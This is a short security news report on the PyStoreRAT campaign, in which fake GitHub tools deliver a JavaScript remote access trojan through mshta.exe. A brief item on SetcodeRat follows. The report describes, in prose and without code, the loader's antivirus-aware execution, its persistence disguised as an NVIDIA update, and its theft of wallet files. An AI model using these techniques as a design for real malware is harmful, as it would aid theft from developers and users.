Cybersecurity Threats Emerge from GitHub Malware Campaign
Full Transcript
Cybersecurity researchers highlight a new campaign exploiting GitHub-hosted Python repositories to distribute a previously undocumented JavaScript-based Remote Access Trojan, or RAT, named PyStoreRAT. According to researcher Yonatan Edri from Morphisec, these repositories, masquerading as development utilities or OSINT tools, contain minimal code designed to download and execute a remote HTA file using mshta.exe.
PyStoreRAT is described as a modular, multi-stage implant capable of executing various payloads including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. The malware also deploys an information stealer called Rhadamanthys.
The campaign has been active since mid-June 2025, with repositories promoted through social media like YouTube and X. The threat actors utilize either newly created or dormant GitHub accounts to publish the repositories, embedding malicious payloads in maintenance commits as the tools gained popularity.
Many of these tools, however, do not function as advertised, often only displaying static interfaces. The malicious loader stub is responsible for triggering the infection chain, which executes a remote HTA payload delivering the PyStoreRAT malware.
This malware can profile systems, check for administrator privileges, and scan for cryptocurrency wallet files linked to Ledger Live, Trezor, and others. The loader stub also gathers information on installed antivirus products to elude detection.
If any are found, it executes mshta.exe through cmd.exe, otherwise it runs mshta.exe directly. Persistence is achieved by creating a scheduled task disguised as an NVIDIA app self-update. The malware can execute various commands, download and execute payloads, and spread via removable drives.
Morphisec indicates that the operation likely involves a threat actor of Eastern European origin due to Russian-language artifacts. The report concludes that PyStoreRAT signifies a shift toward adaptable, script-based implants that evade traditional detection methods.
In related news, QiAnXin has reported another RAT called SetcodeRat, propagating in China since October 2025 through malicious installers for popular software, verifying the victim's region before executing its payload.
The malware connects to Telegram or a conventional C2 server for instructions and performs various data theft activities.